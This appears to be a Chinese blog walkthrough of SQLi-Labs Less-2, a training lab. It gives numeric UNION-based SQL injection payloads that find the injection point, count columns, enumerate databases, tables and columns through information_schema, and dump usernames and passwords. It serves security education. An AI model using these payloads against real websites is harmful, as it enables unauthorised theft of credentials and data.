SQLiLabs-less2通关流程

1. 判断注入点1

?id=1

SQLiLabs-less2通关流程_第1张图片

?id=1 and 1=1

SQLiLabs-less2通关流程_第2张图片

?id=1 and 1=2

SQLiLabs-less2通关流程_第3张图片

报错,存在数字型注入点

2. 判断注入点2

id=1asdasd

SQLiLabs-less2通关流程_第4张图片

SQLiLabs-less2通关流程_第5张图片

胡乱输入没有返回,说明不是字符型,输入纯数字返回正确,可能是数字型

3. 猜解列数

?id=1 order by 4

SQLiLabs-less2通关流程_第6张图片

到4时出现报错,说明有3列属性

4. 获取数据库版本以分辨是否存在information_schema表

?id=-1 union select 1,version(),3

SQLiLabs-less2通关流程_第7张图片

版本5以上,可有据查询

5. 获取当前数据库名

?id=-1 union select 1,database(),3

SQLiLabs-less2通关流程_第8张图片

数据库名:security

6. 获取当前数据库用户(是否为root)

?id=-1 union select 1,user(),3

SQLiLabs-less2通关流程_第9张图片

root用户可以查看所有数据库名

7. (可选)查看所有数据库名

?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata

SQLiLabs-less2通关流程_第10张图片

8. security数据库下的所有表

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'

SQLiLabs-less2通关流程_第11张图片

由名字可知,敏感用户信息应存放在users表中

9. 确定目标表中列名

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'

SQLiLabs-less2通关流程_第12张图片

users表中存在id,username,password三个属性

10. 获取表中username,password信息

?id=-1 union select%20 1,group_concat(username),group_concat(password) from security.users

SQLiLabs-less2通关流程_第13张图片

SQLiLabs-less2通关流程_第14张图片

你可能感兴趣的:(数据库,安全,database)